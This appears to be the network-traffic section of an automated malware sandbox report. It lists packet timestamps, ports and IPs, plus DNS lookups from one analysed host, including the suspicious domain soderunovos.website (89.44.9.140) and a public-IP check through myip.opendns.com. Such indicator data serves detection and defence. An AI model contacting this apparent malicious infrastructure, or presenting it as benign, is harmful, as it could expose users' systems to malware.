Nov 23, 2021 20:59:23.083956003 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084034920 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.084302902 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084321976 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084377050 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.084388018 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084410906 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.084434032 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.084779978 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084800959 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084867001 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.084878922 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.084902048 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.084930897 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.088999987 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.089057922 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.089116096 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.089121103 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.089159966 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.089539051 CET	49751	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.089556932 CET	443	49751	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.295615911 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.295650005 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.295737982 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.296448946 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.296459913 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.425728083 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.425885916 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.426706076 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.426713943 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.431432962 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.431440115 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.536165953 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.536191940 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.536211967 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.536283016 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.536303997 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.536339998 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.536364079 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.536976099 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.537000895 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.537085056 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.537098885 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.537144899 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.576915979 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.576950073 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.577080011 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.577105045 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.577124119 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.577145100 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.577747107 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.577775002 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.577845097 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.577855110 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.577898979 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.578553915 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.578578949 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.578641891 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.578651905 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.578675032 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.578691959 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.617528915 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.617558956 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.617731094 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.617748976 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.617799997 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.618639946 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.618669033 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.618768930 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.618777037 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.618824959 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.619649887 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.619673967 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.619764090 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.619771957 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.619817019 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.620513916 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.620537043 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.620620012 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.620628119 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.620670080 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.621151924 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.621180058 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.621268988 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.621275902 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.621300936 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.621350050 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.621889114 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.621917963 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.621990919 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.621999025 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.622030973 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.622049093 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.623168945 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.623197079 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.623284101 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.623291969 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.623341084 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.658174992 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.658201933 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.658365011 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.658377886 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.658442974 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.658907890 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.658981085 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.659008980 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.659035921 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.659060955 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.659476995 CET	49753	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.659488916 CET	443	49753	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.789534092 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.789592028 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.789729118 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.790496111 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.790520906 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.926182032 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.926330090 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.926847935 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.926865101 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:23.931217909 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:23.931238890 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:24.001416922 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:24.001444101 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:24.001493931 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:24.001514912 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 20:59:24.001516104 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:24.001574993 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:24.001787901 CET	49755	443	192.168.2.3	89.44.9.140
Nov 23, 2021 20:59:24.001811981 CET	443	49755	89.44.9.140	192.168.2.3
Nov 23, 2021 21:01:37.357984066 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:37.358038902 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:37.358125925 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:37.360423088 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:37.360451937 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:37.706243992 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:37.706399918 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.343686104 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.343744040 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.344118118 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.344249964 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.344285965 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.384866953 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.453881979 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.453989029 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.453989029 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.454051018 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.456794977 CET	49817	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.456823111 CET	443	49817	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.476954937 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.476991892 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.477125883 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.477467060 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.477482080 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.814618111 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.814743042 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.818628073 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.818639994 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.818960905 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.819051027 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.819061995 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.860877991 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.934211016 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.934292078 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.934410095 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.934426069 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.934679985 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.934705019 CET	443	49818	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.934719086 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.935228109 CET	49818	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.935302019 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.935338020 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:38.935448885 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.935803890 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:38.935818911 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.156992912 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.157135963 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.157598972 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.157608986 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.158586979 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.158601999 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.444669962 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.444848061 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.444866896 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.444891930 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.445002079 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.445142984 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.445158958 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.445171118 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.445296049 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.445333958 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.445472956 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.445482969 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.445631981 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.494577885 CET	49819	443	192.168.2.3	209.202.254.90
Nov 23, 2021 21:01:39.494616032 CET	443	49819	209.202.254.90	192.168.2.3
Nov 23, 2021 21:01:39.556839943 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.556896925 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.557003021 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.557667971 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.557691097 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.601085901 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.603852987 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.603885889 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.608082056 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.608974934 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.608995914 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.609021902 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.609028101 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.609352112 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.609559059 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.661571026 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.661633015 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.661696911 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.661716938 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.661730051 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.661732912 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.661766052 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.661767960 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.661777020 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.661824942 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.661842108 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.661848068 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.661892891 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.664424896 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.664448977 CET	443	49820	87.248.118.22	192.168.2.3
Nov 23, 2021 21:01:39.664458990 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.664527893 CET	49820	443	192.168.2.3	87.248.118.22
Nov 23, 2021 21:01:39.687269926 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.687309027 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.687408924 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.687861919 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.687876940 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.821858883 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.821969032 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.821986914 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.822036982 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.825716972 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.825731993 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.825853109 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.825862885 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.825956106 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.826028109 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.916393995 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.916459084 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.916488886 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.916508913 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.916522980 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.916557074 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.957545996 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.957564116 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.957683086 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.957731962 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.957751989 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.957767963 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.957771063 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.957844019 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.998323917 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.998447895 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:39.998568058 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:39.998641014 CET	443	49821	212.82.100.140	192.168.2.3
Nov 23, 2021 21:01:40.001907110 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:40.003588915 CET	49821	443	192.168.2.3	212.82.100.140
Nov 23, 2021 21:01:40.003622055 CET	443	49821	212.82.100.140	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2021 20:59:01.141908884 CET	60784	53	192.168.2.3	8.8.8.8
Nov 23, 2021 20:59:01.161288023 CET	53	60784	8.8.8.8	192.168.2.3
Nov 23, 2021 20:59:02.095560074 CET	51143	53	192.168.2.3	8.8.8.8
Nov 23, 2021 20:59:02.115087986 CET	53	51143	8.8.8.8	192.168.2.3
Nov 23, 2021 20:59:22.596138954 CET	49572	53	192.168.2.3	8.8.8.8
Nov 23, 2021 20:59:22.617527008 CET	53	49572	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:33.643055916 CET	53615	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:33.662415028 CET	53	53615	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:33.671132088 CET	53616	53	192.168.2.3	208.67.222.222
Nov 23, 2021 21:01:33.688481092 CET	53	53616	208.67.222.222	192.168.2.3
Nov 23, 2021 21:01:33.690542936 CET	53617	53	192.168.2.3	208.67.222.222
Nov 23, 2021 21:01:33.707777977 CET	53	53617	208.67.222.222	192.168.2.3
Nov 23, 2021 21:01:33.737785101 CET	53618	53	192.168.2.3	208.67.222.222
Nov 23, 2021 21:01:33.755074978 CET	53	53618	208.67.222.222	192.168.2.3
Nov 23, 2021 21:01:37.242913961 CET	50728	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:37.355216980 CET	53	50728	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:38.458543062 CET	53777	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:38.476181984 CET	53	53777	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:39.536601067 CET	57106	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:39.555768013 CET	53	57106	8.8.8.8	192.168.2.3
Nov 23, 2021 21:01:39.667114019 CET	60352	53	192.168.2.3	8.8.8.8
Nov 23, 2021 21:01:39.686436892 CET	53	60352	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 23, 2021 20:59:01.141908884 CET	192.168.2.3	8.8.8.8	0x6b3a	Standard query (0)	yahoo.com	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:02.095560074 CET	192.168.2.3	8.8.8.8	0xb3	Standard query (0)	www.yahoo.com	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:22.596138954 CET	192.168.2.3	8.8.8.8	0x4cb	Standard query (0)	soderunovos.website	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.643055916 CET	192.168.2.3	8.8.8.8	0x74e5	Standard query (0)	resolver1.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.671132088 CET	192.168.2.3	208.67.222.222	0x1	Standard query (0)	222.222.67.208.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.690542936 CET	192.168.2.3	208.67.222.222	0x2	Standard query (0)	myip.opendns.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.737785101 CET	192.168.2.3	208.67.222.222	0x3	Standard query (0)	myip.opendns.com	28	IN (0x0001)
Nov 23, 2021 21:01:37.242913961 CET	192.168.2.3	8.8.8.8	0x3485	Standard query (0)	lycos.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:38.458543062 CET	192.168.2.3	8.8.8.8	0xa124	Standard query (0)	www.lycos.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.536601067 CET	192.168.2.3	8.8.8.8	0xaadd	Standard query (0)	mail.yahoo.com	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:39.667114019 CET	192.168.2.3	8.8.8.8	0x4667	Standard query (0)	login.yahoo.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.143.26	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		98.137.11.163	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		98.137.11.164	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.143.25	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.231.20	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:01.161288023 CET	8.8.8.8	192.168.2.3	0x6b3a	No error (0)	yahoo.com		74.6.231.21	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:02.115087986 CET	8.8.8.8	192.168.2.3	0xb3	No error (0)	www.yahoo.com	new-fp-shed.wg1.b.yahoo.com		CNAME (Canonical name)	IN (0x0001)
Nov 23, 2021 20:59:02.115087986 CET	8.8.8.8	192.168.2.3	0xb3	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.216	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:02.115087986 CET	8.8.8.8	192.168.2.3	0xb3	No error (0)	new-fp-shed.wg1.b.yahoo.com		87.248.100.215	A (IP address)	IN (0x0001)
Nov 23, 2021 20:59:22.617527008 CET	8.8.8.8	192.168.2.3	0x4cb	No error (0)	soderunovos.website		89.44.9.140	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.662415028 CET	8.8.8.8	192.168.2.3	0x74e5	No error (0)	resolver1.opendns.com		208.67.222.222	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:33.688481092 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.688481092 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.688481092 CET	208.67.222.222	192.168.2.3	0x1	No error (0)	222.222.67.208.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Nov 23, 2021 21:01:33.707777977 CET	208.67.222.222	192.168.2.3	0x2	No error (0)	myip.opendns.com		84.17.52.63	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:37.355216980 CET	8.8.8.8	192.168.2.3	0x3485	No error (0)	lycos.com		209.202.254.90	A (IP address)	IN (0x0001)
Nov 23, 2021 21:01:38.476181984 CET	8.8.8.8	192.168.2.3	0xa124	No error (0)	www.lycos.com		209.202.254.90	A (IP address)	IN (0x0001)
